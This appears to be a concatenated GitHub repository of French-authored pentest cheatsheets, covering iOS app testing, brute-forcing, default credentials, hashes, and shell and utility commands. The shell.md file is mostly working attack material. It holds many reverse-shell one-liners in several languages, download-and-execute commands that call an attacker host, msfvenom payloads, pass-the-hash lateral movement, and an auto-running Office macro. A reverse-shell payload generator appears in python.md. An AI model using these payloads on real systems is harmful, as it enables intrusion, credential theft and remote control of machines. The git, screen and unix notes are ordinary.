7 | >https://mobexler.com 8 | 9 | password : `12345` 10 | 11 | 12 | > ipad root default password : `alpine` 13 | 14 | ## [Frida](https://github.com/frida) 15 | 16 | check if your device is connected : `ideviceinfo` 17 | 18 | ### List apps running : 19 | 20 | `frida-ps -Uai` 21 | 22 | 23 | ### Check App 24 | 25 | `frida-trace -U -m "-[NSURL* *HTTP*]"` 26 | 27 | 28 | ## Objection 29 | 30 | run `frida-ps -Uai` then `objection -g explore` 31 | 32 | 33 | `ios info binary` 34 | 35 | 36 | `ls` then `ios plist cat Info.plist` 37 | 38 | 39 | ### dump password from safari : 40 | 41 | `ios nsurlcredentialstorage dump` 42 | 43 | ### Check for creds 44 | 45 | `ios keychain dump` 46 | 47 | ### ssl pinning 48 | 49 | `ios sslpinning disable` 50 | 51 | 52 | ### Search for last research 53 | 54 | `ios nsuserdefaults get` and check `RecentWebSearches` 55 | 56 | ### Search for password 57 | 58 | 59 | `fridump -s -U "My App"` 60 | 61 | `strings *.data > strings.txt` 62 | 63 | and now grep into "pass", "password", "secret", "credential" etc 64 | 65 | 66 | ### Search for cookie 67 | 68 | `ios cookies get` 69 | ### List module in memory 70 | 71 | `memory list modules` 72 | 73 | `memory list exports ` 74 | 75 | 76 | ### Hooking on class 77 | 78 | 79 | `ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController` 80 | 81 | 82 | ### Hooking on method 83 | 84 | `ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return` 85 | 86 | 87 | ### env 88 | 89 | 90 | `env` 91 | 92 | ``` 93 | CachesDirectory /var/mobile/Containers/Data/Application/xxx/Library/Caches 94 | DocumentDirectory /var/mobile/Containers/Data/Application/xxx/Documents 95 | LibraryDirectory /var/mobile/Containers/Data/Application/xxx/Library 96 | ``` 97 | 98 | 99 | ### run js from frida 100 | 101 | `frida -U -f com.xxx.yyy -l alert.js` 102 | 103 | alert script example 104 | 105 | ``` 106 | var UIAlertController = ObjC.classes.UIAlertController; 107 | var UIAlertAction = ObjC.classes.UIAlertAction; 108 | var UIApplication = ObjC.classes.UIApplication; 109 | var handler = new ObjC.Block({ retType: 'void', argTypes: ['object'], implementation: function () {} }); 110 | 111 | ObjC.schedule(ObjC.mainQueue, function () { 112 | var alert = UIAlertController.alertControllerWithTitle_message_preferredStyle_('Frida', 'pwned!', 1); 113 | var defaultAction = UIAlertAction.actionWithTitle_style_handler_('OK', 0, handler); 114 | alert.addAction_(defaultAction); 115 | UIApplication.sharedApplication().keyWindow().rootViewController().presentViewController_animated_completion_(alert, true, NULL); 116 | }) 117 | ``` 118 | 119 | with python : `python3 hook.py alert.js` 120 | 121 | 122 | ``` 123 | import frida, sys 124 | 125 | with open(sys.argv[1], 'r') as f: 126 | jscode = f.read() 127 | process = frida.get_usb_device().attach('') 128 | script = process.create_script(jscode) 129 | print('[ * ] Running alert on target') 130 | script.load() 131 | sys.stdin.read() 132 | ``` 133 | 134 | 135 | ### run static analysis using frida 136 | 137 | `frida --codeshare interference-security/ios-app-static-analysis -U ` (it will execute this code https://codeshare.frida.re/@interference-security/ios-app-static-analysis/ ) 138 | -------------------------------------------------------------------------------- /Cheatsheets/mobile/02-android.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/michmich1000/Cheatsheets/6b4baa1255896e97624ad6f6d3a6a680cceb6dc1/Cheatsheets/mobile/02-android.md -------------------------------------------------------------------------------- /Cheatsheets/passwords/brute-force.md: -------------------------------------------------------------------------------- 1 | # Brute-force 2 | 3 | ## Offline 4 | 5 | ```bash 6 | Brute force : 7 | john --format=NT hashNT.txt 8 | hashcat -m 1000 -a 3 hashNT.txt 9 | 10 | Dictionnaire : 11 | john --format=NT hashNT.txt --worlist=dictionnary.txt --rules=korelogic 12 | john --format=NT hashNT.txt --worlist=dictionnary.txt --rules=insidepro 13 | hashcat -m 1000 -a 0 hashNT.txt dictionnary.txt -r rules/best64.rule 14 | 15 | ``` 16 | 17 | ## TCP 445 (SMB) 18 | 19 | ```bash 20 | crackmapexec smb target.txt -u user1 user2 -p password 21 | crackmapexec smb target.txt -u user -p password1 password2 22 | crackmapexec smb target.txt -u user.txt -p password1 23 | crackmapexec smb target.txt -u user -p password.txt 24 | 25 | # 1 user = 1 password 26 | crackmapexec smb -u user.txt -p password.txt --no-bruteforce --continue-on-succes 27 | 28 | # cluster bomb 29 | crackmapexec smb target.txt -u user.txt -p password.txt --continue-on-succes 30 | 31 | nmap --script smb-brute -p 445 32 | hydra -l -P pass.txt smb -t 1 33 | ``` 34 | 35 | ## TCP 3389 (RDP) 36 | 37 | ```bash 38 | ncrack -vv --user -P pass.txt rdp:// 39 | hydra -V -f -L user.txt -P pass.txt rdp:// 40 | ``` 41 | 42 | --- 43 | 44 | ## TCP 389/636 (LDAP(S)) 45 | 46 | ```bash 47 | python patator.py ldap_login host= binddn='CN=FILE0,dc=,dc=' bindpw=FILE1 0=user.txt 1=pass.txt 48 | 49 | nmap --script ldap-brute -p 389 50 | 51 | ``` 52 | 53 | -------------------------------------------------------------------------------- /Cheatsheets/passwords/default-pass.md: -------------------------------------------------------------------------------- 1 | # Default pass 2 | 3 | ## Saia 4 | 5 | The PCD built in FTP-Server is defined to be connected with only one user 6 | 7 | ```bash 8 | root:rootpasswd 9 | ``` 10 | 11 | --- 12 | 13 | ## Alhua 14 | 15 | ```bash 16 | Username: admin. Password: admin. 17 | Username : admin Password : 1234 18 | Username: 888888. Password: 888888. 19 | Username: 666666. Password: 666666. 20 | Username: default. Password: default. 21 | ``` 22 | 23 | --- 24 | 25 | ## OpenScape Business Assistant 26 | 27 | ```bash 28 | 123456 29 | administrator@system:administrator 30 | ``` 31 | 32 | -------------------------------------------------------------------------------- /Cheatsheets/passwords/hashs.md: -------------------------------------------------------------------------------- 1 | # Hashs 2 | 3 | ## Theorical 4 | 5 | Hash to use with CrackMapExec : `NTLM / NTLMV2 / LM` 6 | 7 | Hash to use with Nlmrelayx :`NET-NTLM / NET-NTLMV2` 8 | 9 | > LM / NTLM\(v2\) can be used at any time. NET-NTLM\(v2\) are usable for a limited period of time. 10 | 11 | ### NTLM 12 | 13 | ```bash 14 | aad3b435b51404eeaad3b435b51404ee:87247c6499ddef87b7348f262a3e203d 15 | aad3b435b51404eeaad3b435b51404ee:64247c6499def845dsffg652a3e2052f 16 | ``` 17 | 18 | > a default NTLM hash will start with :`aad3b435b51404eeaad3b435b51404ee` In other case its an LM hash. 19 | 20 | ### LM 21 | 22 | ```bash 23 | 88647c6699d8ef87b6d48f262b2e2h3d:89244c64f9ddef87b7348f262a3e204d 24 | 12587c6654ddef87b67485sdfb2e203d:64247c6499def845dsffg652a3e2052f 25 | ``` 26 | 27 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/git.md: -------------------------------------------------------------------------------- 1 | # Git 2 | 3 | Push new commit 4 | 5 | ```bash 6 | git checkout -b 7 | git add . 8 | git commit -m "My commit message" 9 | git push origin 10 | 11 | git add . && git commit -m "My commit message" && git push origin master 12 | ``` 13 | 14 | >you also can run `git add -p` to check diff step by step 15 | 16 | 17 | Amend to last comit 18 | 19 | ```bash 20 | git add . && git commit --amend --no-edit && git push -f 21 | ``` 22 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/python.md: -------------------------------------------------------------------------------- 1 | # Python 2 | 3 | ### Manual install .whl 4 | ```python 5 | python3 -m pip install --user .whl 6 | ``` 7 | 8 | 9 | ### Powershell base64 encode 10 | 11 | ```python 12 | #!/usr/bin/env python3 13 | # 14 | # generate reverse powershell cmdline with base64 encoded args 15 | # 16 | 17 | import sys 18 | import base64 19 | 20 | def help(): 21 | print("USAGE: %s IP PORT" % sys.argv[0]) 22 | print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT") 23 | exit() 24 | 25 | try: 26 | (ip, port) = (sys.argv[1], int(sys.argv[2])) 27 | except: 28 | help() 29 | 30 | #payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' 31 | payload = 'Invoke-WebRequest -Uri http://%s/nc.exe -Outfile C:\\Windows\\Temp\\nc.exe ; C:\\Windows\\Temp\\nc.exe -e cmd.exe %s %d;' 32 | payload = payload % (ip, ip, port) 33 | print (payload) 34 | cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() 35 | print(cmdline) 36 | ``` 37 | 38 | ## Encode/decode url 39 | 40 | using cli 41 | 42 | ```bash 43 | alias urldecode='python -c "import sys, urllib as ul; \ print ul.unquote_plus(sys.argv[1])"' 44 | alias urlencode='python -c "import sys, urllib as ul; \ print ul.quote_plus(sys.argv[1])"' 45 | # using => urlencode 'q werty=/;' 46 | ``` 47 | 48 | --- 49 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/screen.md: -------------------------------------------------------------------------------- 1 | # Screen 2 | 3 | ## Screen multiuser 4 | 5 | ```bash 6 | screen -S 7 | screen -x 8 | ctrl+a :multiuser on 9 | ``` 10 | 11 | If you are stucked with a small windows into multiuser screen 12 | 13 | ```bash 14 | # detach 15 | ctrl+a d 16 | # reattach detaching everyone else 17 | screen -rd 18 | ``` 19 | 20 | ## Log screen 21 | 22 | ```bash 23 | ctrl+a H 24 | ``` 25 | 26 | ## Split screen 27 | 28 | ```bash 29 | # split horizontal 30 | CTRL+a + maj S 31 | # split vertical 32 | CTRL+a + | 33 | # unsplit 34 | CTRL+a + X 35 | ``` 36 | 37 | ## Switch window on screen 38 | 39 | ```bash 40 | CTRL+a + tab 41 | ``` 42 | 43 | ## Next/precedent window 44 | 45 | ```bash 46 | CTRL+a + n 47 | CTRL+a + p 48 | ``` 49 | 50 | ## New Window 51 | 52 | ```bash 53 | CTRL+a + c 54 | ``` 55 | 56 | ## Scroll 57 | 58 | ```bash 59 | CTRL+a + echap 60 | ``` 61 | 62 | ## Close window 63 | 64 | ```bash 65 | CTRL + d 66 | ``` 67 | 68 | ## Detach screen 69 | 70 | ```bash 71 | CTRL+a + d 72 | ``` 73 | 74 | ## Detach screen and close window 75 | 76 | ```bash 77 | CTRL+a + DD 78 | ``` 79 | 80 | --- 81 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/shell.md: -------------------------------------------------------------------------------- 1 | # Shells 2 | 3 | 4 | ## Windows Shell 5 | 6 | ### SMB 7 | 8 | ```bash 9 | wmiexec.py \:@ 10 | winexe -U /% // cmd.exe /c dir C:\ 11 | pth-winexe -U % // cmd 12 | impacket-psexec ':@' 13 | impacket-psexec @targets.txt -u domain\user -p password -s command 14 | 15 | crackmapexec smb --exec-method wmiexec -u -d -H -x 16 | crackmapexec smb --exec-method smbexec -u -d -H -x 17 | crackmapexec smb --exec-method atexec -u -d -H -x 18 | crackmapexec smb --exec-method mmcexec -u -d -H -x 19 | 20 | WmiExec.ps1 -ComputerName "" -Command "Get-ChildItem C:\" 21 | 22 | Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:cmd.exe"' 23 | Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName 24 | 25 | wmic /node:"" /user:"" /password:"" process call create "powershell -Sta -Nop -Window Hidden -EncodedCommand " 26 | 27 | schtasks /create /S /SC Weekly /RU /TN /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http:///Invoke-PowerShellTcp.ps1''')'" ; schtasks /Run /S /TN 28 | 29 | Copy-Item .\nc.exe \\\C$\Users\Public\Downloads 30 | schtasks /create /S /SC Weekly /RU /TN /TR "C:\Users\Public\Downloads\nc.exe -e cmd " ; schtasks /Run /S /TN 31 | 32 | ``` 33 | 34 | ### WinRM 35 | 36 | ```bash 37 | gem install evil-winrm 38 | evil-winrm -i -u -p '' 39 | ``` 40 | 41 | 42 | --- 43 | 44 | 45 | ## SQL shell 46 | 47 | ### Mysql webshell 48 | 49 | ```bash 50 | SELECT '' INTO OUTFILE '/' 51 | 52 | ``` 53 | 54 | ### MSSQL reverse shell 55 | 56 | ```bash 57 | # https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1 58 | Invoke-SQLOCmd -Verbose -Command "powershell iex(New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1') -Instance 59 | ``` 60 | 61 | --- 62 | 63 | ## Reverse Shell 64 | 65 | 66 | ### Check outgoing ports 67 | 68 | **Internet** 69 | 70 | [portquiz](http://portquiz.net/) 71 | 72 | **local** 73 | 74 | ```bash 75 | # Generate and execute on target 76 | msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe > test_firewall.exe 77 | 78 | # Listen for incoming traffic 79 | tcpdump -ni any host 80 | ``` 81 | ### CMD 82 | 83 | ```bash 84 | certutil -urlcache -split -f http://:1234/shell.exe C:\Windows\Temp\shell.exe & start "" C:\Windows\Temp\shell.exe 85 | 86 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U shell.exe 87 | ``` 88 | 89 | ### Powershell 90 | 91 | ```bash 92 | # Reflective PE injection 93 | String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http:///met.dll');(New-Object System.Net.WebClient).DownloadString('http:///Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"; 94 | 95 | # Basic download and exec 96 | Invoke-WebRequest -Uri "http://:1234/nc.exe" -OutFile "nc.exe" & .\nc.exe -e cmd.exe 1234 97 | 98 | echo Invoke-WebRequest -Uri http://:1234/revshell.exe -Outfile c:\windows\temp\revshell.exe | powershell -noprofile 99 | 100 | powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://:1234/shell.ps1')|iex" 101 | 102 | powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 103 | 104 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 105 | 106 | powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1') 107 | 108 | # Powercat 109 | IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1') 110 | 111 | powercat -c -p 1234 -e cmd.exe 112 | 113 | powercat -c -p 1234 -e cmd.exe -g > reverse.ps1 114 | .\reverse.ps1 115 | 116 | powercat -c -p 1234 -e cmd.exe -ge > reverse 117 | 118 | powershell -e ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgA..... 119 | ``` 120 | 121 | 122 | ### Bash TCP 123 | 124 | ```bash 125 | bash -i >& /dev/tcp//1234 0>&1 126 | 0<&196;exec 196<>/dev/tcp//4242; sh <&196 >&196 2>&196 127 | exec 5<> /dev/tcp//4242; cat <&5 | while read line; do $line 2>&5>&5; done 128 | ``` 129 | 130 | ### Bash UDP 131 | 132 | ```bash 133 | Victim: 134 | sh -i >& /dev/udp//4242 0>&1 135 | 136 | Listener: 137 | nc -u -lvp 4242 138 | ``` 139 | 140 | > Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash 141 | 142 | 143 | 144 | ### Python 145 | 146 | ```sh 147 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 148 | 149 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' 150 | 151 | export RHOST="";export RPORT=1234;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' 152 | ``` 153 | 154 | ### Perl 155 | 156 | ```bash 157 | perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 158 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 159 | 160 | # NOTE: Windows only 161 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,":1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 162 | ``` 163 | 164 | ### PHP 165 | 166 | ```bash 167 | php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 168 | php -r '$sock=fsockopen("",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3");' 169 | php -r '$sock=fsockopen("",1234);system("/bin/sh -i <&3 >&3 2>&3");' 170 | php -r '$sock=fsockopen("",1234);passthru("/bin/sh -i <&3 >&3 2>&3");' 171 | php -r '$sock=fsockopen("",1234);popen("/bin/sh -i <&3 >&3 2>&3", "r");' 172 | php -r '$sock=fsockopen("",1234);`/bin/sh -i <&3 >&3 2>&3`;' 173 | php -r '$sock=fsockopen("",1234);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' 174 | ``` 175 | 176 | 177 | ### Ruby 178 | 179 | ```bash 180 | ruby -rsocket -e'f=TCPSocket.open("",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 181 | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 182 | 183 | # NOTE: Windows only 184 | ruby -rsocket -e 'c=TCPSocket.new("","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 185 | ``` 186 | 187 | 188 | ### Netcat 189 | 190 | ```bash 191 | nc -e /bin/sh 1234 192 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f 193 | ``` 194 | 195 | ### Socat 196 | 197 | ```bash 198 | socat -d -d TCP4-LISTEN:1234 STDOUT 199 | socat TCP4::1234 EXEC:/bin/bash 200 | 201 | socat TCP4-LISTEN:1234,reuseaddr,fork EXEC:/home/leak 202 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::1234 203 | 204 | socat file:`tty`,raw,echo=0 TCP-L:1234 205 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::1234 206 | 207 | 208 | wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::1234 209 | ``` 210 | 211 | ### Awk 212 | 213 | ```bash 214 | awk 'BEGIN {s = "/inet/tcp/0//1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null 215 | ``` 216 | 217 | ### War 218 | 219 | ```bash 220 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1234 -f war > reverse.war 221 | ``` 222 | 223 | 224 | --- 225 | 226 | ## Get interactive listener 227 | 228 | Using Pwncat 229 | 230 | ```bash 231 | pwncat-cs -p 232 | #then CTRL+D to move to the victim machine 233 | ``` 234 | 235 | --- 236 | 237 | ## Get better BASH shell 238 | 239 | Using socat 240 | 241 | ```bash 242 | #Listener: 243 | socat file:`tty`,raw,echo=0 tcp-listen:1234 244 | 245 | #Victim: 246 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::1234 247 | ``` 248 | 249 | Using stty 250 | 251 | ```bash 252 | python -c 'import pty; pty.spawn("/bin/sh")' 253 | ctrl + z 254 | stty raw -echo;fg 255 | reset 256 | ``` 257 | 258 | ## File transfer 259 | 260 | ### Bitsadmin 261 | 262 | ```bash 263 | certutil -encode exe.exe file.txt 264 | bitsadmin /Transfeer jobname http:///file.txt C:\\file.txt 265 | certutil -decode file.txt exe.exe 266 | ``` 267 | 268 | ### Netcat 269 | 270 | ```bash 271 | nc -nlvp 80 > received.txt 272 | nc 80 < sent.txt 273 | ``` 274 | ### Socat 275 | 276 | Socat nossl 277 | 278 | ```bash 279 | socat TCP4-LISTEN:80,fork file:secret_passwords.txt 280 | socat TCP4::80 file:received_secret_passwords.txt,create 281 | ``` 282 | 283 | Socat SSL 284 | 285 | ```bash 286 | openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt 287 | sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash 288 | 289 | socat -OPENSSL::443,verify=0 290 | ``` 291 | 292 | ### Python HTTP 293 | 294 | ```bash 295 | python -m SimpleHTTPServer 8080 296 | python3 -m http.server 8080 297 | ``` 298 | 299 | ### SMB impacket 300 | 301 | ```bash 302 | sudo impacket-smbserver -smb2support share_name /tmp/sharefolder 303 | copy \\\\ 304 | ``` 305 | 306 | ### Powershell 307 | 308 | ```bash 309 | disable UAC 310 | Set-ExecutionPolicy Unrestricted 311 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')" 312 | Invoke-WebRequest -Uri http:/// -Outfile 313 | ``` 314 | 315 | ### Powercat 316 | 317 | ```bash 318 | nc -lnvp 1234 > 319 | powercat -c -p 1234 -i 320 | 321 | powercat -l -v -p 443 -t 1000 322 | ``` 323 | 324 | ## Metasploit 325 | 326 | ```bash 327 | # Generate shell 328 | msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=1234 -f elf > shell.elf 329 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 -f exe > reverse.exe 330 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT=1234 -f macho > shell.macho 331 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 -f asp > shell.asp 332 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1234 -f war > shell.war 333 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=1234 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 334 | 335 | # generate handler 336 | msfconsole 337 | use exploit/multi/handler 338 | set PAYLOAD linux/x64/meterpreter/reverse_tcp 339 | jobs -l 340 | jobs -K 341 | set ExitOnSession false 342 | set AUTORUNSCRIPT post/windows/manage/migrate 343 | run -j 344 | makerc /tmp/msf.rc 345 | msfconsole -r /tmp/msf.rc 346 | 347 | # Download and execute on target 348 | wget :1234/shell.elf -O /tmp/shell.elf && chmod 777 /tmp/shell.elf && /tmp/shell.elf & 349 | 350 | # Upload, hide and exec from meterpreter 351 | execute -H -i -c -m -d calc.exe -f /tmp/exploit.exe -a '-arg1 -arg2 -arg3' 352 | 353 | # Multi post modules 354 | echo "post/windows/gather/credentials/sso" >> /tmp/multi_post.rc 355 | echo "post/windows/gather/credentials/gpp" >> /tmp/multi_post.rc 356 | use post/multi/manage/multi_post 357 | set MACRO=/tmp/macro.rc 358 | set SESSION 1 359 | run -j 360 | ``` 361 | 362 | ## Office Macro 363 | 364 | 365 | ```bash 366 | # generate using metasploit 367 | msfvenom -p windows/shell_reverse_tcp LHOST="" LPORT=443 -f hta-psh > revshell.hta 368 | 369 | # python split macro 370 | str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....." 371 | n = 50 372 | for i in range(0, len(str), n): 373 | print "Str = Str + " + '"' + str[i:i+n] + '"' 374 | 375 | 376 | # macro 377 | Sub AutoOpen() 378 | juan 379 | End Sub 380 | 381 | Sub Document_Open() 382 | juan 383 | 384 | End Sub 385 | Sub juan() 386 | Dim Str As String 387 | Str = Str + "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZ" 388 | Str = Str + "QByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA" 389 | Str = Str + "AAvAE0AVABpAFIAVABEACcAKQApADsA" 390 | 391 | CreateObject("Wscript.Shell").Run Str 392 | End Sub 393 | ``` 394 | 395 | ## Web proxies 396 | 397 | - Use an allowed domain such as cloudfront.net, wordpress.net, azurewebsites.net, etc. 398 | - check user-agent 399 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/unix.md: -------------------------------------------------------------------------------- 1 | # Bash 2 | 3 | ## Alias 4 | 5 | ```bash 6 | # Clipboard 7 | alias sclip="xclip -selection c" 8 | alias gclip="xclip -selection c -o" 9 | 10 | # IPs 11 | grep -ao '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'| sort -u 12 | 13 | # IP Ranges 14 | awk -F. '{print $1"."$2"."$3".0/24"}' 15 | 16 | ## Nmap parsing (Hosts up) 17 | cat *.gnmap | grep -i "open/tcp" | cut -d " " -f2 | sort -u 18 | 19 | ## Nmap parsing (Open Ports) 20 | cat *.nmap | grep -i " open" | cut -d "/" -f1 | sort -u | paste -sd ',' 21 | 22 | ## Nessus parsing (Hosts up) 23 | cat *.csv |grep -i 'tcp",' |cut -d "," -f5 | tr -d '"' |sort -u 24 | 25 | ## Nessus parsing (Open Ports) 26 | cat *.csv |grep -i 'tcp",' |cut -d "," -f7 | tr -d '"' |sort -u | sed -r '/^\s*$/d' | tr "\n" ", " | rev | cut -c2- |rev | sed 's/, */, /g' | cut -f 2- -d ' ' 27 | 28 | # SAM hash (from crackmapexec log files) 29 | awk -F: '{print $1":"$3":"$4}' |tr [:upper:] [:lower:] | sort -u 30 | ``` 31 | 32 | ## Save output to log file 33 | 34 | ```bash 35 | | tee -a /tmp/logfile 36 | ``` 37 | 38 | ## Compilation 39 | 40 | Compile for x86 Linux from a x64 Linux machine 41 | 42 | ```bash 43 | sudo apt update && sudo apt install -y gcc-multilib 44 | gcc -Wl,--hash-style=both -m32 45 | ``` 46 | 47 | Cross-Compile for x86 Windows from a x64 Linux machine 48 | 49 | ```bash 50 | sudo apt update && sudo apt install -y mingw-w64 51 | i686-w64-mingw32-gcc 52 | i686-w64-mingw32-gcc -lws2_32 MS11-046.c 53 | ``` 54 | 55 | 56 | ## Search for files 57 | 58 | ```bash 59 | find / -iname "*user.txt*" 2>/dev/null 60 | updatedb && locate 61 | ``` 62 | 63 | ## Services listening 64 | 65 | ```bash 66 | netstat -latupen |grep LISTEN 67 | ``` 68 | 69 | ## Process running 70 | 71 | ```bash 72 | ps faux 73 | ``` 74 | 75 | ## Disk space 76 | 77 | ```bash 78 | df -h 79 | ncdu -x 80 | ``` 81 | 82 | --- 83 | 84 | ## Netcat send file 85 | 86 | ```bash 87 | # listener 88 | nc -l -p 1234 > out.file 89 | 90 | # sender 91 | nc -w 3 1234 < in.file 92 | ``` 93 | 94 | --- 95 | 96 | 97 | ## Speak to other users 98 | 99 | ```bash 100 | who 101 | write /dev/pts/ 102 | echo "hello" |wall 103 | ``` 104 | 105 | --- 106 | 107 | ## Nginx syslink 108 | 109 | ```bash 110 | in "enable" do : ln -s ../site-avaible/.conf . 111 | ``` 112 | 113 | ## RDP 114 | 115 | ```sh 116 | xfreerdp /u: /d: /pth:[lm]: /v: 117 | rdesktop -u -p -r disk:floppy=/tmp/share 118 | ``` 119 | 120 | ## Fail2ban 121 | 122 | ```bash 123 | fail2ban-client status # to list all jail 124 | fail2ban-client status 125 | fail2ban-client set unbanip XX.XX.XX.XX # To unban someone 126 | fail2ban-client -vvv set banip XX.XX.XX.XX # To ban someone 127 | ``` 128 | 129 | you also can do this to get all banned ip from jail `zgrep 'Ban' /var/log/fail2ban.log* | grep ` 130 | 131 | 132 | >since 0.10 version u can use `unban -all` 133 | 134 | 135 | 136 | ## veracrypt 137 | 138 | ### How to create volume 139 | `veracrypt -t --create report.vc --hash sha512 --encryption AES --filesystem ext4 --volume-type normal -k "" --pim 0 --size 200M` 140 | 141 | > You can also add --password test but, 